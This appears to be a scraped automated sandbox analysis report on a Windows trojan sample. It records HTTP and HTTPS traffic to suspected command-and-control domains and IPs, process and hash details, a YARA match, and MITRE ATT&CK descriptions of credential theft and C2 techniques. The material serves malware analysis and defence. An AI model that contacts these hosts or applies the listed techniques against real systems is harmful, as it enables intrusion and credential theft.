Feb 23, 2021 17:50:59.219062090 CET	6482	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 23 Feb 2021 16:50:59 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 248 Connection: keep-alive Location: http://dolboeb1701.com/bgczXibj92HSlSCK/ Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 64 6f 6c 62 6f 65 62 31 37 30 31 2e 63 6f 6d 2f 62 67 63 7a 58 69 62 6a 39 32 48 53 6c 53 43 4b 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://dolboeb1701.com/bgczXibj92HSlSCK/">here</a>.</p></body></html>
Feb 23, 2021 17:50:59.220699072 CET	6483	OUT	GET /bgczXibj92HSlSCK/ HTTP/1.1 Connection: Keep-Alive Host: dolboeb1701.com
Feb 23, 2021 17:50:59.347143888 CET	6483	IN	HTTP/1.1 302 Found Server: nginx Date: Tue, 23 Feb 2021 16:50:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive Set-Cookie: PHPSESSID=f84qhg8e3t915dmhm2crp648n2; expires=Mon, 18-Apr-2072 10:11:58 GMT; Max-Age=1614100859; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: login.php
Feb 23, 2021 17:50:59.349730015 CET	6483	OUT	GET /bgczXibj92HSlSCK/login.php HTTP/1.1 Connection: Keep-Alive Host: dolboeb1701.com Cookie: PHPSESSID=f84qhg8e3t915dmhm2crp648n2
Feb 23, 2021 17:50:59.467884064 CET	6484	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Feb 2021 16:50:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 231 Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Data Raw: 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 6d 65 74 68 6f 64 3d 22 70 6f 73 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 75 73 65 72 6e 61 6d 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20 6e 61 6d 65 3d 22 70 61 73 73 77 6f 72 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html> <body> <form method="post"> <input type="text" name="username" /> <input type="password" name="password" /> <input type="submit"/> </form> </body></html>

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Feb 23, 2021 17:49:26.643413067 CET	88.80.20.20	443	192.168.2.6	49718	CN=bdns.at CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Feb 18 16:26:43 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Wed May 19 17:26:43 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Feb 23, 2021 17:49:26.643413067 CET	88.80.20.20	443	192.168.2.6	49718	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19
Feb 23, 2021 17:49:27.446496010 CET	88.80.20.20	443	192.168.2.6	49721	CN=bdns.at CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Feb 18 16:26:43 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Wed May 19 17:26:43 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0	ce5f3254611a8c095a3d821d44539877
Feb 23, 2021 17:49:27.446496010 CET	88.80.20.20	443	192.168.2.6	49721	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		ce5f3254611a8c095a3d821d44539877
Feb 23, 2021 17:49:37.342988968 CET	88.80.21.20	443	192.168.2.6	49730	CN=bdns.at CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Feb 18 16:26:43 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Wed May 19 17:26:43 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Feb 23, 2021 17:49:37.342988968 CET	88.80.21.20	443	192.168.2.6	49730	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19
Feb 23, 2021 17:49:38.215089083 CET	88.80.21.20	443	192.168.2.6	49732	CN=bdns.at CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Feb 18 16:26:43 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Wed May 19 17:26:43 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0	ce5f3254611a8c095a3d821d44539877
Feb 23, 2021 17:49:38.215089083 CET	88.80.21.20	443	192.168.2.6	49732	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		ce5f3254611a8c095a3d821d44539877
Feb 23, 2021 17:49:48.096213102 CET	194.54.82.12	443	192.168.2.6	49734	CN=bdns.at CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Feb 18 16:26:43 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Wed May 19 17:26:43 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Feb 23, 2021 17:49:48.096213102 CET	194.54.82.12	443	192.168.2.6	49734	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19
Feb 23, 2021 17:49:49.007860899 CET	194.54.82.12	443	192.168.2.6	49736	CN=bdns.at CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Feb 18 16:26:43 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Wed May 19 17:26:43 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0	ce5f3254611a8c095a3d821d44539877
Feb 23, 2021 17:49:49.007860899 CET	194.54.82.12	443	192.168.2.6	49736	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		ce5f3254611a8c095a3d821d44539877
Feb 23, 2021 17:49:59.192593098 CET	190.115.26.106	443	192.168.2.6	49740	CN=bdns.at CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Feb 18 16:26:43 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Wed May 19 17:26:43 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Feb 23, 2021 17:49:59.192593098 CET	190.115.26.106	443	192.168.2.6	49740	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19
Feb 23, 2021 17:50:00.172326088 CET	190.115.26.106	443	192.168.2.6	49742	CN=bdns.at CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Feb 18 16:26:43 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Wed May 19 17:26:43 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0	ce5f3254611a8c095a3d821d44539877
Feb 23, 2021 17:50:00.172326088 CET	190.115.26.106	443	192.168.2.6	49742	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		ce5f3254611a8c095a3d821d44539877
Feb 23, 2021 17:50:10.284246922 CET	62.75.198.178	443	192.168.2.6	49748	CN=bdns.at CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Feb 18 16:26:43 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Wed May 19 17:26:43 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Feb 23, 2021 17:50:10.284246922 CET	62.75.198.178	443	192.168.2.6	49748	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19
Feb 23, 2021 17:50:10.853003979 CET	62.75.198.178	443	192.168.2.6	49751	CN=bdns.at CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Feb 18 16:26:43 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Wed May 19 17:26:43 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0	ce5f3254611a8c095a3d821d44539877
Feb 23, 2021 17:50:10.853003979 CET	62.75.198.178	443	192.168.2.6	49751	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		ce5f3254611a8c095a3d821d44539877
Feb 23, 2021 17:50:11.499095917 CET	88.80.20.20	443	192.168.2.6	49754	CN=bdns.at CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Feb 18 16:26:43 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Wed May 19 17:26:43 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Feb 23, 2021 17:50:11.499095917 CET	88.80.20.20	443	192.168.2.6	49754	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19
Feb 23, 2021 17:50:33.044198036 CET	194.54.82.13	443	192.168.2.6	49768	CN=bdns.at CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Feb 18 16:26:43 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Wed May 19 17:26:43 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Feb 23, 2021 17:50:33.044198036 CET	194.54.82.13	443	192.168.2.6	49768	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19
Feb 23, 2021 17:50:34.597976923 CET	88.80.20.20	443	192.168.2.6	49769	CN=bdns.at CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Feb 18 16:26:43 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Wed May 19 17:26:43 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0	ce5f3254611a8c095a3d821d44539877
Feb 23, 2021 17:50:34.597976923 CET	88.80.20.20	443	192.168.2.6	49769	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		ce5f3254611a8c095a3d821d44539877
Feb 23, 2021 17:50:56.477161884 CET	88.80.20.20	443	192.168.2.6	49777	CN=bdns.at CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Feb 18 16:26:43 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Wed May 19 17:26:43 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
Feb 23, 2021 17:50:56.477161884 CET	88.80.20.20	443	192.168.2.6	49777	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		37f463bf4616ecd445d4a1937da06e19
Feb 23, 2021 17:50:57.219146013 CET	194.54.82.12	443	192.168.2.6	49779	CN=bdns.at CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Feb 18 16:26:43 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Wed May 19 17:26:43 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0	ce5f3254611a8c095a3d821d44539877
Feb 23, 2021 17:50:57.219146013 CET	194.54.82.12	443	192.168.2.6	49779	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		ce5f3254611a8c095a3d821d44539877
Feb 23, 2021 17:50:58.209019899 CET	144.76.12.6	443	192.168.2.6	49781	CN=dotbit.me CN=dotbit.me CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Jan 07 19:48:43 CET 2021 Thu Jan 07 19:48:43 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Wed Apr 07 20:48:43 CEST 2021 Wed Apr 07 20:48:43 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
					CN=dotbit.me	CN=R3, O=Let's Encrypt, C=US	Thu Jan 07 19:48:43 CET 2021	Wed Apr 07 20:48:43 CEST 2021
					CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe PID: 7084 Parent PID: 6016

General

Start time:	17:49:23
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.36362611.3113.exe'
Imagebase:	0x400000
File size:	330240 bytes
MD5 hash:	9DC97EAED4E61901AFC327CE9F122262
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: SUSP_XORed_URL_in_EXE, Description: Detects an XORed URL in an executable, Source: 00000001.00000003.337105580.0000000002BF0000.00000004.00000001.sdmp, Author: Florian Roth
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used such as Ping or `net view` using Net . Adversaries may also use local host files (ex: `C:\Windows\System32\Drivers\etc\hosts` or `/etc/hosts` ) in order to discover the hostname to IP address mappings of remote systems.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report SecuriteInfo.com.Trojan.GenericKD.36362611.3113.2129

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

Code Manipulations

Statistics